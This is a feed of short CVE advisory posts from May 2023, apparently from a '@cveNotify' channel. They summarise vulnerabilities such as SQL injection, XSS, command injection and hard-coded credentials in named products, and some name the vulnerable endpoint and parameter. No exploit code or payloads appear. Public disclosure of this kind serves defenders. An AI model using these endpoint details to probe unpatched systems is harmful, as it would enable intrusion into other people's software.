🚨 CVE-2023-31842Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/index.php?page=edit_faculty&id=.🎖@cveNotify |
|
| 2023-05-23 17:58:13 |
🚨 CVE-2023-31844Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_subject.php?id=.🎖@cveNotify |
|
| 2023-05-23 17:58:12 |
🚨 CVE-2022-41801Uncontrolled resource consumption in the Intel(R) Connect M Android application before version 1.82 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-05-23 10:58:18 |
🚨 CVE-2023-23693Dell VxRail, versions prior to 7.0.450, contains an OS command injection Vulnerability in DCManager command-line utility. A local high privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.🎖@cveNotify |
|
| 2023-05-23 10:58:16 |
🚨 CVE-2023-23694Dell VxRail versions earlier than 7.0.450, contain(s) an OS command injection vulnerability in VxRail Manager. A local authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.🎖@cveNotify |
|
| 2023-05-23 10:58:15 |
🚨 CVE-2022-22512Hard-coded credentials in Web-UI of multiple VARTA Storage products in multiple versions allows an unauthorized attacker to gain administrative access to the Web-UI via network.🎖@cveNotify |
|
| 2023-05-23 10:58:14 |
🚨 CVE-2023-1731In Meinbergs LTOS versions prior to V7.06.013, the configuration file upload function would not correctly validate the input, which would allow an remote authenticated attacker with high privileges to execute arbitrary commands.🎖@cveNotify |
|
| 2023-05-23 10:58:13 |
🚨 CVE-2023-2845Improper Access Control in GitHub repository cloudexplorer-dev/cloudexplorer-lite prior to v1.1.0.🎖@cveNotify |
|
| 2023-05-23 06:58:31 |
🚨 CVE-2023-27518Buffer overflow vulnerability in the multiple setting pages of SolarView Compact SV-CPT-MC310 versions prior to Ver.8.10 and SV-CPT-MC310F versions prior to Ver.8.10 allows a remote authenticated attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-05-23 06:58:30 |
🚨 CVE-2023-27920Improper access control vulnerability in the system date/time setting page of SolarView Compact SV-CPT-MC310 versions prior to Ver.8.10 and SV-CPT-MC310F versions prior to Ver.8.10 allows a remote authenticated attacker to alter system date/time of the affected product.🎖@cveNotify |
|
| 2023-05-23 06:58:29 |
🚨 CVE-2023-27922Cross-site scripting vulnerability in Newsletter versions prior to 7.6.9 allows a remote unauthenticated attacker to inject an arbitrary script.🎖@cveNotify |
|
| 2023-05-23 06:58:25 |
🚨 CVE-2023-27925Cross-site scripting vulnerability in Post function of VK Blocks 1.53.0.1 and earlier and VK Blocks Pro 1.53.0.1 and earlier allows a remote authenticated attacker to inject an arbitrary script.🎖@cveNotify |
|
| 2023-05-23 06:58:24 |
🚨 CVE-2023-28367Cross-site scripting vulnerability in CTA post function of VK All in One Expansion Unit 9.88.1.0 and earlier allows a remote authenticated attacker to inject an arbitrary script.🎖@cveNotify |
|
| 2023-05-23 06:58:23 |
🚨 CVE-2023-28390Privilege escalation vulnerability in SR-7100VN firmware Ver.1.38(N) and earlier and SR-7100VN #31 firmware Ver.1.21 and earlier allows a network-adjacent attacker with administrative privilege of the affected product to obtain an administrative privilege of the OS (Operating System). As a result, an arbitrary OS command may be executed.🎖@cveNotify |
|
| 2023-05-23 06:58:19 |
🚨 CVE-2023-28394Beekeeper Studio versions prior to 3.9.9 allows a remote authenticated attacker to execute arbitrary JavaScript code with the privilege of the application on the PC where the affected product is installed. As a result, an arbitrary OS command may be executed as well.🎖@cveNotify |
|
| 2023-05-23 06:58:18 |
🚨 CVE-2023-28409Unrestricted upload of file with dangerous type exists in MW WP Form versions v4.4.2 and earlier, which may allow a remote unauthenticated attacker to upload an arbitrary file.🎖@cveNotify |
|
| 2023-05-23 06:58:17 |
🚨 CVE-2023-28413Directory traversal vulnerability in Snow Monkey Forms versions v5.0.6 and earlier allows a remote unauthenticated attacker to obtain sensitive information, alter the website, or cause a denial-of-service (DoS) condition.🎖@cveNotify |
|
| 2023-05-23 06:58:14 |
🚨 CVE-2023-30469Cross-site Scripting vulnerability in Hitachi Ops Center Analyzer (Hitachi Ops Center Analyzer detail view component) allows Reflected XSS.This issue affects Hitachi Ops Center Analyzer: from 10.9.1-00 before 10.9.2-00.🎖@cveNotify |
|
| 2023-05-23 06:58:13 |
🚨 CVE-2023-22654Client-side enforcement of server-side security issue exists in T&D Corporation and ESPEC MIC CORP. data logger products, which may lead to an arbitrary script execution on a logged-in user's web browser. Affected products and versions are as follows: T&D Corporation data logger products (TR-71W/72W all firmware versions, RTR-5W all firmware versions, WDR-7 all firmware versions, WDR-3 all firmware versions, and WS-2 all firmware versions), and ESPEC MIC CORP. data logger products (RT-12N/RS-12N all firmware versions, RT-22BN all firmware versions, and TEU-12N all firmware versions).🎖@cveNotify |
|
| 2023-05-23 06:58:12 |
🚨 CVE-2023-27304Operation restriction bypass vulnerability in Message and Bulletin of Cybozu Garoon 4.6.0 to 5.9.2 allows a remote authenticated attacker to alter the data of Message and/or Bulletin.🎖@cveNotify |
|
| 2023-05-23 00:58:25 |
🚨 CVE-2022-46658The affected product is vulnerable to a stack-based buffer overflow which could lead to a denial of service or remote code execution.🎖@cveNotify |
|
| 2023-05-23 00:58:21 |
🚨 CVE-2022-47311A proprietary protocol for iBoot devices is used for control and keepalive commands. The function compares the username and password; it also contains the configuration data for the user specified. If the user does not exist, then it sends a value for username and password, which allows successful authentication for a connection.🎖@cveNotify |
|
| 2023-05-23 00:58:20 |
🚨 CVE-2023-2504Files present on firmware images could allow an attacker to gain unauthorized access as a root user using hard-coded credentials.🎖@cveNotify |
|
| 2023-05-23 00:58:16 |
🚨 CVE-2023-2505The affected products have a CSRF vulnerability that could allow an attacker to execute code and upload malicious files.🎖@cveNotify |
|
| 2023-05-23 00:58:15 |
🚨 CVE-2023-25834Changes to user permissions in Portal for ArcGIS 10.9.1 and below are incompletely applied in specific use cases. This issue may allow users to access content that they are no longer privileged to access.🎖@cveNotify |
|
| 2023-05-23 00:58:14 |
🚨 CVE-2021-3803nth-check is vulnerable to Inefficient Regular Expression Complexity🎖@cveNotify |
|
| 2023-05-22 21:58:24 |
🚨 CVE-2022-29840Server-Side Request Forgery (SSRF) vulnerability that could allow a rogue server on the local network to modify its URL to point back to the loopback adapter was addressed in Western Digital My Cloud OS 5 devices. This could allow the URL to exploit other vulnerabilities on the local server.This issue affects My Cloud OS 5 devices before 5.26.202.🎖@cveNotify |
|
| 2023-05-22 21:58:21 |
🚨 CVE-2023-29986spring-boot-actuator-logview 0.2.13 allows Directory Traversal to sibling directories via LogViewEndpoint.view.🎖@cveNotify |
|
| 2023-05-22 21:58:20 |
🚨 CVE-2023-30172A directory traversal vulnerability in the /get-artifact API method of the mlflow platform up to v2.0.1 allows attackers to read arbitrary files on the server via the path parameter.🎖@cveNotify |
|
| 2023-05-22 21:58:19 |
🚨 CVE-2023-27067Directory Traversal vulnerability in Sitecore Experience Platform through 10.2 allows remote attackers to download arbitrary files via crafted command to download.aspx🎖@cveNotify |
|
| 2023-05-22 21:58:18 |
🚨 CVE-2023-28467In MyBB before 1.8.34, there is XSS in the User CP module via the user email field.🎖@cveNotify |
|
| 2023-05-22 21:58:14 |
🚨 CVE-2021-32819Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023.🎖@cveNotify |
|
| 2023-05-22 21:58:13 |
🚨 CVE-2023-20027A vulnerability in the implementation of the IPv4 Virtual Fragmentation Reassembly (VFR) feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper reassembly of large packets that occurs when VFR is enabled on either a tunnel interface or on a physical interface that is configured with a maximum transmission unit (MTU) greater than 4,615 bytes. An attacker could exploit this vulnerability by sending fragmented packets through a VFR-enabled interface on an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.🎖@cveNotify |
|
| 2023-05-22 21:58:12 |
🚨 CVE-2023-20035A vulnerability in the CLI of Cisco IOS XE SD-WAN Software could allow an authenticated, local attacker to execute arbitrary commands with elevated privileges. This vulnerability is due to insufficient input validation by the system CLI. An attacker with privileges to run commands could exploit this vulnerability by first authenticating to an affected device using either local terminal access or a management shell interface and then submitting crafted input to the system CLI. A successful exploit could allow the attacker to execute commands on the underlying operating system with root-level privileges. An attacker with limited user privileges could use this vulnerability to gain complete control over the system. Note: For additional information about specific impacts, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-22 16:58:42 |
🚨 CVE-2021-46775Improper input validation in ABL may enable anattacker with physical access, to perform arbitrary memory overwrites,potentially leading to a loss of integrity and code execution. 🎖@cveNotify |
|
| 2023-05-22 16:58:41 |
🚨 CVE-2022-23818Insufficient input validation on the modelspecific register: VM_HSAVE_PA may potentially lead to loss of SEV-SNP guestmemory integrity. 🎖@cveNotify |
|
| 2023-05-22 16:58:40 |
🚨 CVE-2016-8741The Apache Qpid Broker for Java can be configured to use different so called AuthenticationProviders to handle user authentication. Among the choices are the SCRAM-SHA-1 and SCRAM-SHA-256 AuthenticationProvider types. It was discovered that these AuthenticationProviders in Apache Qpid Broker for Java 6.0.x before 6.0.6 and 6.1.x before 6.1.1 prematurely terminate the SCRAM SASL negotiation if the provided user name does not exist thus allowing remote attacker to determine the existence of user accounts. The Vulnerability does not apply to AuthenticationProviders other than SCRAM-SHA-1 and SCRAM-SHA-256.🎖@cveNotify |
|
| 2023-05-22 16:58:39 |
🚨 CVE-2017-15702In Apache Qpid Broker-J 0.18 through 0.32, if the broker is configured with different authentication providers on different ports one of which is an HTTP port, then the broker can be tricked by a remote unauthenticated attacker connecting to the HTTP port into using an authentication provider that was configured on a different port. The attacker still needs valid credentials with the authentication provider on the spoofed port. This becomes an issue when the spoofed port has weaker authentication protection (e.g., anonymous access, default accounts) and is normally protected by firewall rules or similar which can be circumvented by this vulnerability. AMQP ports are not affected. Versions 6.0.0 and newer are not affected.🎖@cveNotify |
|
| 2023-05-22 16:58:35 |
🚨 CVE-2017-15701In Apache Qpid Broker-J versions 6.1.0 through 6.1.4 (inclusive) the broker does not properly enforce a maximum frame size in AMQP 1.0 frames. A remote unauthenticated attacker could exploit this to cause the broker to exhaust all available memory and eventually terminate. Older AMQP protocols are not affected.🎖@cveNotify |
|
| 2023-05-22 16:58:34 |
🚨 CVE-2023-20524An attacker with a compromised ASP couldpossibly send malformed commands to an ASP on another CPU, resulting in an outof bounds write, potentially leading to a loss a loss of integrity.🎖@cveNotify |
|
| 2023-05-22 16:58:33 |
🚨 CVE-2022-32287A relative path traversal vulnerability in a FileUtil class used by the PEAR management component of Apache UIMA allows an attacker to create files outside the designated target directory using carefully crafted ZIP entry names. This issue affects Apache UIMA Apache UIMA version 3.3.0 and prior versions. Note that PEAR files should never be installed into an UIMA installation from untrusted sources because PEAR archives are executable plugins that will be able to perform any actions with the same privileges as the host Java Virtual Machine.🎖@cveNotify |
|
| 2023-05-22 16:58:32 |
🚨 CVE-2021-46754Insufficient input validation in the ASP (AMDSecure Processor) bootloader may allow an attacker with a compromised Uapp orABL to coerce the bootloader into exposing sensitive information to the SMU(System Management Unit) resulting in a potential loss of confidentiality andintegrity.🎖@cveNotify |
|
| 2023-05-22 16:58:29 |
🚨 CVE-2021-46755Failure to unmap certain SysHub mappings inerror paths of the ASP (AMD Secure Processor) bootloader may allow an attackerwith a malicious bootloader to exhaust the SysHub resources resulting in apotential denial of service.🎖@cveNotify |
|
| 2023-05-22 16:58:28 |
🚨 CVE-2022-4904A flaw was found in the c-ares package. The ares_set_sortlist is missing checks about the validity of the input string, which allows a possible arbitrary length stack overflow. This issue may cause a denial of service or a limited impact on confidentiality and integrity.🎖@cveNotify |
|
| 2023-05-22 16:58:27 |
🚨 CVE-2021-46756Insufficient validation of inputs inSVC_MAP_USER_STACK in the ASP (AMD Secure Processor) bootloader may allow anattacker with a malicious Uapp or ABL to send malformed or invalid syscall tothe bootloader resulting in a potential denial of service and loss ofintegrity.🎖@cveNotify |
|
| 2023-05-22 16:58:26 |
🚨 CVE-2021-46759Improper syscall input validation in AMD TEE(Trusted Execution Environment) may allow an attacker with physical access andcontrol of a Uapp that runs under the bootloader to reveal the contents of theASP (AMD Secure Processor) bootloader accessible memory to a serial port,resulting in a potential loss of integrity.🎖@cveNotify |
|
| 2023-05-22 16:58:22 |
🚨 CVE-2021-46760A malicious or compromised UApp or ABL can senda malformed system call to the bootloader, which may result in an out-of-boundsmemory access that may potentially lead to an attacker leaking sensitiveinformation or achieving code execution.🎖@cveNotify |
|
| 2023-05-22 16:58:21 |
🚨 CVE-2021-46765Insufficient input validation in ASP may allowan attacker with a compromised SMM to induce out-of-bounds memory reads withinthe ASP, potentially leading to a denial of service.🎖@cveNotify |
|
| 2023-05-22 16:58:20 |
🚨 CVE-2021-46773Insufficient input validation in ABL may enablea privileged attacker to corrupt ASP memory, potentially resulting in a loss ofintegrity or code execution.🎖@cveNotify |
|
| 2023-05-22 16:58:19 |
🚨 CVE-2019-0092Insufficient input validation vulnerability in subsystem for Intel(R) AMT before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.🎖@cveNotify |
|
| 2023-05-22 14:58:14 |
🚨 CVE-2023-25537Dell PowerEdge 14G server BIOS versions prior to 2.18.1 and Dell Precision BIOS versions prior to 2.18.2, contain an Out of Bounds write vulnerability. A local attacker with low privileges could potentially exploit this vulnerability leading to exposure of some SMRAM stack/data/code in System Management Mode, leading to arbitrary code execution or escalation of privilege.🎖@cveNotify |
|
| 2023-05-22 14:58:13 |
🚨 CVE-2023-28709The fix for CVE-2023-24998 was incomplete for Apache Tomcat 11.0.0-M2 to 11.0.0-M4, 10.1.5 to 10.1.7, 9.0.71 to 9.0.73 and 8.5.85 to 8.5.87. If non-default HTTP connector settings were used such that the maxParameterCount could be reached using query string parameters and a request was submitted that supplied exactly maxParameterCount parameters in the query string, the limit for uploaded request parts could be bypassed with the potential for a denial of service to occur.🎖@cveNotify |
|
| 2023-05-22 14:58:12 |
🚨 CVE-2023-2832 SQL Injection in GitHub repository unilogies/bumsys prior to 2.2.0.🎖@cveNotify |
|
| 2023-05-22 12:58:13 |
🚨 CVE-2023-33297Bitcoin Core before 24.1, when debug mode is not used, allows attackers to cause a denial of service (CPU consumption) because draining the inventory-to-send queue is inefficient, as exploited in the wild in May 2023.🎖@cveNotify |
|
| 2023-05-22 12:58:12 |
🚨 CVE-2023-33236MXsecurity version 1.0 is vulnearble to hardcoded credential vulnerability. This vulnerability has been reported that can be exploited to craft arbitrary JWT tokens and subsequently bypass authentication for web-based APIs.🎖@cveNotify |
|
| 2023-05-22 12:58:11 |
🚨 CVE-2022-0010Insertion of Sensitive Information into Log File vulnerability in ABB QCS 800xA, ABB QCS AC450, ABB Platform Engineering Tools.An attacker, who already has local access to the QCS nodes, could successfully obtain the password for a system user account. Using this information, the attacker could have the potential to exploit this vulnerability to gain control of system nodes. This issue affects QCS 800xA: from 1.0;0 through 6.1SP2; QCS AC450: from 1.0;0 through 5.1SP2; Platform Engineering Tools: from 1.0:0 through 2.3.0.🎖@cveNotify |
|
| 2023-05-22 10:58:17 |
🚨 CVE-2022-0010Insertion of Sensitive Information into Log File vulnerability in ABB QCS 800xA, ABB QCS AC450, ABB Platform Engineering Tools.An attacker, who already has local access to the QCS nodes, could successfully obtain the password for a system user account. Using this information, the attacker could have the potential to exploit this vulnerability to gain control of system nodes. This issue affects QCS 800xA: from 1.0;0 through 6.1SP2; QCS AC450: from 1.0;0 through 5.1SP2; Platform Engineering Tools: from 1.0:0 through 2.3.0.🎖@cveNotify |
|
| 2023-05-22 10:58:16 |
🚨 CVE-2023-33235MXsecurity version 1.0 is vulnearble to command injection vulnerability. This vulnerability has been reported in the SSH CLI program, which can be exploited by attackers who have gained authorization privileges. The attackers can break out of the restricted shell and subsequently execute arbitrary code.🎖@cveNotify |
|
| 2023-05-22 10:58:15 |
🚨 CVE-2019-25137Umbraco CMS 4.11.8 through 7.15.10, and 7.12.4, allows Remote Code Execution by authenticated administrators via msxsl:script in an xsltSelection to developer/Xslt/xsltVisualize.aspx.🎖@cveNotify |
|
| 2023-05-22 10:58:14 |
🚨 CVE-2023-33297Bitcoin Core before 24.1, when debug mode is not used, allows attackers to cause a denial of service (CPU consumption) because draining the inventory-to-send queue is inefficient, as exploited in the wild in May 2023.🎖@cveNotify |
|
| 2023-05-22 05:58:36 |
🚨 CVE-2021-20312A flaw was found in ImageMagick in versions 7.0.11, where an integer overflow in WriteTHUMBNAILImage of coders/thumbnail.c may trigger undefined behavior via a crafted image file that is submitted by an attacker and processed by an application using ImageMagick. The highest threat from this vulnerability is to system availability.🎖@cveNotify |
|
| 2023-05-22 05:58:33 |
🚨 CVE-2021-20309A flaw was found in ImageMagick in versions before 7.0.11 and before 6.9.12, where a division by zero in WaveImage() of MagickCore/visual-effects.c may trigger undefined behavior via a crafted image file submitted to an application using ImageMagick. The highest threat from this vulnerability is to system availability.🎖@cveNotify |
|
| 2023-05-22 05:58:32 |
🚨 CVE-2021-20244A flaw was found in ImageMagick in MagickCore/visual-effects.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of math division by zero. The highest threat from this vulnerability is to system availability.🎖@cveNotify |
|
| 2023-05-22 05:58:31 |
🚨 CVE-2021-20246A flaw was found in ImageMagick in MagickCore/resample.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of math division by zero. The highest threat from this vulnerability is to system availability.🎖@cveNotify |
|
| 2023-05-22 05:58:27 |
🚨 CVE-2021-20176A divide-by-zero flaw was found in ImageMagick 6.9.11-57 and 7.0.10-57 in gem.c. This flaw allows an attacker who submits a crafted file that is processed by ImageMagick to trigger undefined behavior through a division by zero. The highest threat from this vulnerability is to system availability.🎖@cveNotify |
|
| 2023-05-22 05:58:26 |
🚨 CVE-2023-33264In Hazelcast through 5.0.4, 5.1 through 5.1.6, and 5.2 through 5.2.3, configuration routines don't mask passwords in the member configuration properly. This allows Hazelcast Management Center users to view some of the secrets.🎖@cveNotify |
|
| 2023-05-22 00:58:45 |
🚨 CVE-2022-39956The OWASP ModSecurity Core Rule Set (CRS) is affected by a partial rule set bypass for HTTP multipart requests by submitting a payload that uses a character encoding scheme via the Content-Type or the deprecated Content-Transfer-Encoding multipart MIME header fields that will not be decoded and inspected by the web application firewall engine and the rule set. The multipart payload will therefore bypass detection. A vulnerable backend that supports these encoding schemes can potentially be exploited. The legacy CRS versions 3.0.x and 3.1.x are affected, as well as the currently supported versions 3.2.1 and 3.3.2. Integrators and users are advised upgrade to 3.2.2 and 3.3.3 respectively. The mitigation against these vulnerabilities depends on the installation of the latest ModSecurity version (v2.9.6 / v3.0.8).🎖@cveNotify |
|
| 2023-05-22 00:58:43 |
🚨 CVE-2022-39957The OWASP ModSecurity Core Rule Set (CRS) is affected by a response body bypass. A client can issue an HTTP Accept header field containing an optional "charset" parameter in order to receive the response in an encoded form. Depending on the "charset", this response can not be decoded by the web application firewall. A restricted resource, access to which would ordinarily be detected, may therefore bypass detection. The legacy CRS versions 3.0.x and 3.1.x are affected, as well as the currently supported versions 3.2.1 and 3.3.2. Integrators and users are advised to upgrade to 3.2.2 and 3.3.3 respectively.🎖@cveNotify |
|
| 2023-05-22 00:58:42 |
🚨 CVE-2022-40468Potential leak of left-over heap data if custom error page templates containing special non-standard variables are used. Tinyproxy commit 84f203f and earlier use uninitialized buffers in process_request() function.🎖@cveNotify |
|
| 2023-05-22 00:58:40 |
🚨 CVE-2022-38749Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.🎖@cveNotify |
|
| 2023-05-22 00:58:36 |
🚨 CVE-2022-38750Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.🎖@cveNotify |
|
| 2023-05-22 00:58:35 |
🚨 CVE-2022-38751Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.🎖@cveNotify |
|
| 2023-05-22 00:58:34 |
🚨 CVE-2022-34911An issue was discovered in MediaWiki before 1.35.7, 1.36.x and 1.37.x before 1.37.3, and 1.38.x before 1.38.1. XSS can occur in configurations that allow a JavaScript payload in a username. After account creation, when it sets the page title to "Welcome" followed by the username, the username is not escaped: SpecialCreateAccount::successfulAction() calls ::showSuccessPage() with a message as second parameter, and OutputPage::setPageTitle() uses text().🎖@cveNotify |
|
| 2023-05-22 00:58:33 |
🚨 CVE-2022-34912An issue was discovered in MediaWiki before 1.37.3 and 1.38.x before 1.38.1. The contributions-title, used on Special:Contributions, is used as page title without escaping. Hence, in a non-default configuration where a username contains HTML entities, it won't be escaped.🎖@cveNotify |
|
| 2023-05-22 00:58:28 |
🚨 CVE-2022-31090Guzzle, an extensible PHP HTTP client. `Authorization` headers on requests are sensitive information. In affected versions when using our Curl handler, it is possible to use the `CURLOPT_HTTPAUTH` option to specify an `Authorization` header. On making a request which responds with a redirect to a URI with a different origin (change in host, scheme or port), if we choose to follow it, we should remove the `CURLOPT_HTTPAUTH` option before continuing, stopping curl from appending the `Authorization` header to the new request. Affected Guzzle 7 users should upgrade to Guzzle 7.4.5 as soon as possible. Affected users using any earlier series of Guzzle should upgrade to Guzzle 6.5.8 or 7.4.5. Note that a partial fix was implemented in Guzzle 7.4.2, where a change in host would trigger removal of the curl-added Authorization header, however this earlier fix did not cover change in scheme or change in port. If you do not require or expect redirects to be followed, one should simply disable redirects all together. Alternatively, one can specify to use the Guzzle steam handler backend, rather than curl.🎖@cveNotify |
|
| 2023-05-22 00:58:27 |
🚨 CVE-2022-28202An XSS issue was discovered in MediaWiki before 1.35.6, 1.36.x before 1.36.4, and 1.37.x before 1.37.2. The widthheight, widthheightpage, and nbytes properties of messages are not escaped when used in galleries or Special:RevisionDelete.🎖@cveNotify |
|
| 2023-05-22 00:58:26 |
🚨 CVE-2022-28209An issue was discovered in Mediawiki through 1.37.1. The check for the override-antispoof permission in the AntiSpoof extension is incorrect.🎖@cveNotify |
|
| 2023-05-22 00:58:25 |
🚨 CVE-2022-28205An issue was discovered in MediaWiki through 1.37.1. The CentralAuth extension mishandles a ttl issue for groups expiring in the future.🎖@cveNotify |
|
| 2023-05-22 00:58:20 |
🚨 CVE-2022-28206An issue was discovered in MediaWiki through 1.37.1. ImportPlanValidator.php in the FileImporter extension mishandles the check for edit rights.🎖@cveNotify |
|
| 2023-05-22 00:58:19 |
🚨 CVE-2021-45342A buffer overflow vulnerability in CDataList of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document.🎖@cveNotify |
|
| 2023-05-22 00:58:18 |
🚨 CVE-2021-45341A buffer overflow vulnerability in CDataMoji of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document.🎖@cveNotify |
|
| 2023-05-22 00:58:17 |
🚨 CVE-2021-44858An issue was discovered in MediaWiki before 1.35.5, 1.36.x before 1.36.3, and 1.37.x before 1.37.1. It is possible to use action=edit&undo= followed by action=mcrundo and action=mcrrestore to view private pages on a private wiki that has at least one page set in $wgWhitelistRead.🎖@cveNotify |
|
| 2023-05-21 22:58:16 |
🚨 CVE-2023-33251When Akka HTTP before 10.5.2 accepts file uploads via the FileUploadDirectives.fileUploadAll directive, the temporary file it creates has too weak permissions: it is readable by other users on Linux or UNIX, a similar issue to CVE-2022-41946.🎖@cveNotify |
|
| 2023-05-21 22:58:15 |
🚨 CVE-2021-46888An issue was discovered in hledger before 1.23. A Stored Cross-Site Scripting (XSS) vulnerability exists in toBloodhoundJson that allows an attacker to execute JavaScript by encoding user-controlled values in a payload with base64 and parsing them with the atob function.🎖@cveNotify |
|
| 2023-05-21 10:58:11 |
🚨 CVE-2023-2826A vulnerability has been found in SourceCodester Class Scheduling System 1.0 and classified as problematic. This vulnerability affects unknown code of the file search_teacher_result.php of the component POST Parameter Handler. The manipulation of the argument teacher leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229612.🎖@cveNotify |
|
| 2023-05-20 20:58:24 |
🚨 CVE-2023-33244Obsidian before 1.2.2 allows calls to unintended APIs (for microphone access, camera access, and desktop notification) via an embedded web page.🎖@cveNotify |
|
| 2023-05-20 20:58:23 |
🚨 CVE-2023-32668LuaTeX before 1.17.0 allows a document (compiled with the default settings) to make arbitrary network requests. This occurs because full access to the socket library is permitted by default, as stated in the documentation. This also affects TeX Live before 2023 r66984 and MiKTeX before 23.5.🎖@cveNotify |
|
| 2023-05-20 16:58:26 |
🚨 CVE-2023-1692The window management module lacks permission verification.Successful exploitation of this vulnerability may affect confidentiality.🎖@cveNotify |
|
| 2023-05-20 16:58:25 |
🚨 CVE-2023-1693The Settings module has the file privilege escalation vulnerability.Successful exploitation of this vulnerability may affect confidentiality.🎖@cveNotify |
|
| 2023-05-20 16:58:24 |
🚨 CVE-2023-1694The Settings module has the file privilege escalation vulnerability.Successful exploitation of this vulnerability may affect confidentiality.🎖@cveNotify |
|
| 2023-05-20 16:58:23 |
🚨 CVE-2023-32784In KeePass 2.x before 2.54, it is possible to recover the cleartext master password from a memory dump, even when a workspace is locked or no longer running. The memory dump can be a KeePass process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system. The first character cannot be recovered. In 2.54, there is different API usage and/or random string insertion for mitigation.🎖@cveNotify |
|
| 2023-05-20 13:58:30 |
🚨 CVE-2023-2712Unrestricted Upload of File with Dangerous Type vulnerability in "Rental Module" developed by third-party for Ideasoft's E-commerce Platform allows Command Injection, Using Malicious Files, Upload a Web Shell to a Web Server.This issue affects Rental Module: before 23.05.15.🎖@cveNotify |
|
| 2023-05-20 13:58:29 |
🚨 CVE-2023-2822A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.10.6 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-229596.🎖@cveNotify |
|
| 2023-05-20 11:58:26 |
🚨 CVE-2023-2823A vulnerability was found in SourceCodester Class Scheduling System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/edit_subject.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229597 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-20 11:58:25 |
🚨 CVE-2023-2824A vulnerability was found in SourceCodester Dental Clinic Appointment Reservation System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/service.php of the component POST Parameter Handler. The manipulation of the argument service leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-229598 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-20 11:58:24 |
🚨 CVE-2023-2822A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.10.6 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-229596.🎖@cveNotify |
|
| 2023-05-20 05:58:51 |
🚨 CVE-2023-2714The Groundhogg plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'check_license' functions in versions up to, and including, 2.7.9.8. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to change the license key and support license key, but it can only be changed to a valid license key.🎖@cveNotify |
|
| 2023-05-20 05:58:50 |
🚨 CVE-2023-2715The Groundhogg plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'submit_ticket' function in versions up to, and including, 2.7.9.8. This makes it possible for authenticated attackers to create a support ticket that sends the website's data to the plugin developer, and it is also possible to create an admin access with an auto login link that is also sent to the plugin developer with the ticket. It only works if the plugin is activated with a valid license.🎖@cveNotify |
|
| 2023-05-20 05:58:49 |
🚨 CVE-2023-2716The Groundhogg plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the 'ajax_upload_file' function in versions up to, and including, 2.7.9.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload a file to the contact, and then lists all the other uploaded files related to the contact.🎖@cveNotify |
|
| 2023-05-20 05:58:48 |
🚨 CVE-2023-2717The Groundhogg plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.7.9.8. This is due to missing nonce validation on the 'enable_safe_mode' function. This makes it possible for unauthenticated attackers to enable safe mode, which disables all other plugins, via a forged request if they can successfully trick an administrator into performing an action such as clicking on a link. A warning message about safe mode is displayed to the admin, which can be easily disabled.🎖@cveNotify |
|
| 2023-05-20 05:58:47 |
🚨 CVE-2023-2735The Groundhogg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gh_form' shortcode in versions up to, and including, 2.7.9.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Please note this only works with legacy contact forms.🎖@cveNotify |
|
